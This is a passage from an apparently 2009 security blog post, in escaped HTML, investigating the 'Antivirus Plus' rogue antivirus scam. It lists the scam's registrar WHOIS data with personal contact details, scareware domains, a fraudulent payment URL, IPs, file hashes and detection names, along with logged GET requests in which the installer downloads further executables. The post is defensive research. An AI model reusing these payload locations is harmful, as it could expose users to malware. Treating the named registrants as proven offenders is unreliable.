bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;In addition to fake scanner domain, recent research also reveal that several sites are &lt;br /&gt;registered through &amp;quot;EVOPLUS LTD&amp;quot; with the information as follow:&lt;br /&gt;&lt;br /&gt;Registrant:&lt;br /&gt;Live Internet Marketing Limited         ****@liveinternetmarketingltd.com&lt;br /&gt;attn: Private Registrations&lt;br /&gt;5285 Decarie Boulevard #100&lt;br /&gt;Montreal, QC H3W3C2&lt;br /&gt;Canada&lt;br /&gt;+1-514-371-5650&lt;br /&gt;&lt;br /&gt;Domain Name: LIVEINTERNETMARKETINGLTD.COM&lt;br /&gt;Registrar: EVOPLUS LTD&lt;br /&gt;Whois   Server: whois.evonames.com&lt;br /&gt;Referral URL: http://www.evonames.com&lt;br /&gt;Name   Server: NS1.LIVEINTERNETMARKETINGLTD.COM&lt;br /&gt;Name Server:   NS2.LIVEINTERNETMARKETINGLTD.COM&lt;br /&gt;Status: clientDeleteProhibited&lt;br /&gt;Status:   clientTransferProhibited&lt;br /&gt;Status: clientUpdateProhibited&lt;br /&gt;Updated Date:   27-mar-2009&lt;br /&gt;Creation Date: 20-feb-2009&lt;br /&gt;Expiration Date: 20-feb-2010&lt;br /&gt;&lt;br /&gt;Registered Through:&lt;br /&gt;AdvancedHosters.com (http://www.AdvancedHosters.com)&lt;br /&gt;&lt;br /&gt;******************************&lt;br /&gt;&lt;br /&gt; Looking on google show absolutely no web presence apart from malware and pornography websites:&lt;br /&gt;&lt;br /&gt;For &lt;a href="http://www.google.com/search?hl=en&amp;amp;q=&amp;quot;liveinternetmarketingltd&amp;quot;" target="_blank"&gt;&amp;quot;liveinternetmarketingltd&amp;quot;&lt;/a&gt;: Malware domain drop and pornography websites&lt;br /&gt;For &lt;a href="http://www.google.com/search?hl=en&amp;amp;q=&amp;quot;Live+Internet+Marketing+Limited&amp;quot;" target="_blank"&gt;&amp;quot;Live Internet Marketing Limited&amp;quot;&lt;/a&gt;: Pornography websites&lt;br /&gt;For &lt;a href="http://www.google.com/search?hl=en&amp;amp;q=&amp;quot;liveinternetmarketingltd.com&amp;quot;" target="_blank"&gt;&amp;quot;liveinternetmarketingltd.com&amp;quot;&lt;/a&gt;: Pornography websites and malware domain found by Malware Domain List.&lt;br /&gt;&lt;br /&gt;Looking on malwaredomainlist show 23 sites with the registrant information &amp;quot;liveinternetmarketingltd.com&amp;quot;.&lt;br /&gt;&lt;br /&gt;Some domain have been added to the list below:&lt;br /&gt;&lt;br /&gt;antivirus-plus-new.com&lt;br /&gt;antivirusplussite.com&lt;br /&gt; bestinternetexamine.com&lt;br /&gt;bestnetcheckonline.com&lt;br /&gt;bestwebexamine.com&lt;br /&gt;downloadantivirusplus.com&lt;br /&gt;easynetcheckonline.com&lt;br /&gt;easywebchecklive.com&lt;br /&gt;easywebexamine.com&lt;br /&gt;easywebscanlive.com&lt;br /&gt;internethomecheck.com&lt;br /&gt;linkcanlive.com&lt;br /&gt;linkcanonline.com&lt;br /&gt;linkcanpro.com&lt;br /&gt;myantivirusplus.com&lt;br /&gt;myinternetexamine.com&lt;br /&gt;onlinescanweb.com&lt;br /&gt;rapldhsare.com&lt;br /&gt;safeyouthnet.com&lt;br /&gt;security-check-center.com&lt;br /&gt;securesoftinternet.com&lt;br /&gt;theantivirusplus.com&lt;br /&gt;websecurecheck.com&lt;br /&gt;websmartcheck.com&lt;br /&gt;websportscheck.com&lt;br /&gt;yourinternetexamine.com&lt;br /&gt;yournetascertain.com&lt;br /&gt;yournetcheckonline.com&lt;br /&gt;yournetcheckonline.com&lt;br /&gt;yourwebexamine.com&lt;br /&gt;yourwebscanlive.com&lt;br /&gt;yourwebscanpro.com&lt;br /&gt;&lt;br /&gt;  **********************&lt;br /&gt;&lt;br /&gt; &lt;u&gt;SUSPENDED domain&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM&lt;br /&gt;&lt;br /&gt;&lt;b&gt;antivirusplus.biz&lt;/b&gt;&lt;br /&gt;***&lt;br /&gt;&lt;b&gt;antivirusplus2009.net&lt;/b&gt;&lt;br /&gt;&lt;a href="https://safeweb.norton.com/report/show?name=antivirusplus2009.net" target="_blank"&gt;Symantec Result&lt;/a&gt;&lt;br /&gt;  Registration Service Provided By: HIGH QUALITY HOST COMPANY&lt;br /&gt;  ***&lt;br /&gt;&lt;b&gt;avplus2009.com&lt;/b&gt;&lt;br /&gt;&lt;a href="https://safeweb.norton.com/report/show?name=avplus2009.com" target="_blank"&gt;Symantec Result&lt;/a&gt;    &lt;br /&gt;  PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM&lt;br /&gt;  ***  &lt;br /&gt;&lt;b&gt;internet-check.net&lt;/b&gt;&lt;br /&gt;  PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM&lt;br /&gt;*** &lt;b&gt;&lt;br /&gt;traffchecking.com&lt;/b&gt;&lt;br /&gt;Registration Service Provided By: ERDOMAIN.COM&lt;br /&gt;Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;**********************  &lt;/p&gt;&lt;p&gt;&lt;u&gt;ACTIVE domain&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;***    &lt;br /&gt;&lt;b&gt;av-plus-support.com&lt;/b&gt;&lt;br /&gt;PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM&lt;br /&gt;***    &lt;br /&gt;&lt;br /&gt;antivirusplussite.com has a fake error page which redirect to downloadantivirusplus.com/buy.php?id=&lt;br /&gt;&lt;br /&gt;downloadantivirusplus.com is also hosted on the same IP at ZlKon, also registered by &amp;quot;Live Internet Marketing Limited&amp;quot; and the fraudulent payment page is on the domain below:&lt;br /&gt;&lt;br /&gt;https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&amp;amp;advert=&lt;br /&gt;&lt;br /&gt;209.8.25.204 - ns1.secure-plus-payments.com&lt;br /&gt;&lt;br /&gt;  Registration Service Provided By: RESELLERCLUB&lt;/p&gt;  &lt;p&gt;Registrant:&lt;br /&gt;Globo inc&lt;br /&gt;John Sparck        (sparck000@mail.com)&lt;br /&gt;South reg, 14 st, 3&lt;br /&gt;Atoll&lt;br /&gt;,3290867&lt;br /&gt;BB&lt;br /&gt;Tel. +27.221994&lt;/p&gt;  &lt;p&gt;&amp;quot;Globo inc&amp;quot; include: antivirus--plus.com, plus-antivirus.com (Already suspended)&lt;/p&gt;  &lt;p&gt;  **********************&lt;br /&gt;Looking on &lt;a href="http://www.spamhaus.org/query/bl?ip=94.247.2.215" target="_blank"&gt;spamhaus&lt;/a&gt; also reveal&lt;br /&gt;&lt;br /&gt;newp-digital.com &lt;br /&gt;webspywareremover2009.com &lt;br /&gt;cure-soft.com  [63.219.177.210]&lt;br /&gt;innovagest2000s.com&lt;br /&gt;secure-softwaretools.com [207.226.175.124]&lt;br /&gt;**********************&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Host on    94.247.2.215 [hs.2-215.zlkon.lv] AS12553&lt;br /&gt;&lt;br /&gt;AS12553 PCEXPRESS-AS &amp;quot;DATORU EXPRESS SERVISS&amp;quot; Ltd.&lt;br /&gt;&lt;br /&gt;Some screenshot&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGXhhCI/AAAAAAAAAQ4/oYQGr3c6cnA/s1600-h/yournetascertain.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGXhhCI/AAAAAAAAAQ4/oYQGr3c6cnA/s320/yournetascertain.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689603306530" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGzFR7I/AAAAAAAAAQw/4VZad901kB4/s1600-h/downloadantivirusplus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 297px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgUGzFR7I/AAAAAAAAAQw/4VZad901kB4/s320/downloadantivirusplus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786689718896562" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdAgT-JVOpI/AAAAAAAAAQo/1ILrYgNdBKw/s1600-h/bestwebexamine.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdAgT-JVOpI/AAAAAAAAAQo/1ILrYgNdBKw/s320/bestwebexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786687396297362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgT8dyayI/AAAAAAAAAQg/mutAb--Dc_U/s1600-h/bestinternetexamine.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SdAgT8dyayI/AAAAAAAAAQg/mutAb--Dc_U/s320/bestinternetexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786686945225506" /&gt;&lt;/a&gt;&lt;br /&gt;
 &lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="16" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="514"&gt;&lt;br /&gt;&lt;table width="514" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="17"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="99"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;installer_1.exe&lt;/td&gt;&lt;td width="62"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;666112 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;03a1e599d66c64cd11eb5f20d3645767&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="3" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=14a7afddf1abf91e4dda10a549589bfba" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=03a1e599d66c64cd11eb5f20d3645767" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/6bd9da2d0000574b72634ea98f9b4245" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;03.27.2009 17:40:50 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;17/38 (44.74%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="225"&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeXPA!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="111"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;TR/Crypt.XPACK.Gen&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Antivir&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;SHeur2.YCE&lt;/span&gt;&lt;/td&gt;&lt;td&gt;AVG&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;(Suspicious) - DNAScan&lt;/span&gt;&lt;/td&gt;&lt;td&gt;CAT-QuickHeal&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.DownLoad.33473&lt;/span&gt;&lt;/td&gt;&lt;td&gt;DrWeb&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Delf.swq&lt;/span&gt;&lt;/td&gt;&lt;td&gt;F-Secure&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;W32/FakeAV.NW!tr&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Fortinet&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Ikarus&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="225"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Delf.swq&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Kaspersky&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Generic Downloader.x&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Generic Downloader.x&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Crypt.XPACK.Gen&lt;/span&gt;&lt;/td&gt;&lt;td&gt;McAfee-GW-Edition&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;TrojanDownloader:Win32/Renos.BAO&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Microsoft&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious File&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Panda&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Troj/FakeAV-NW&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Sophos&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Fakeavalert.B&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Sunbelt&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan Horse&lt;/span&gt;&lt;/td&gt;&lt;td&gt;Symantec&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;We can see on &lt;a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html"&gt;this post&lt;/a&gt; that the file downloaded two or three days after is updated with a new code.&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Result when running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;    &lt;br /&gt;    HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]&lt;br /&gt;&lt;br /&gt;GET: myantivirusplus.com/install/AntivirusPlus.exe &lt;br /&gt;GET: myantivirusplus.com/install/InternetExplorer.dll &lt;br /&gt;GET: myantivirusplus.com/cfg/dmns.cfg &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table width="370" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="19"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="92"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td width="226"&gt;AntivirusPlus.exe&lt;/td&gt;&lt;td width="33"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;1435136 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;f0bc697765f31bd431e776387aca2c7f&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1ce304ec73cca52440dd2b9bf9be6006b" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank"&gt;First Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank"&gt;Second Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td&gt;03.27.2009 14:17:34 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td&gt;Result: 7/39 (17.95%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Second time&lt;/td&gt;&lt;td&gt;03.30.2009 05:23:52 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td&gt;Result: 12/39 (30.77%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;New info&lt;/td&gt;&lt;td&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=0F1F76FB00F83E21E6DF158F5C45B4008B59BC51"&gt;Prevx&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeXPA!IK&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;FakeAlert&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.FakeXPA&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan:Win32/FakePlus&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;table width="370" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="19"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="92"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td width="226"&gt;InternetExplorer.dll&lt;/td&gt;&lt;td 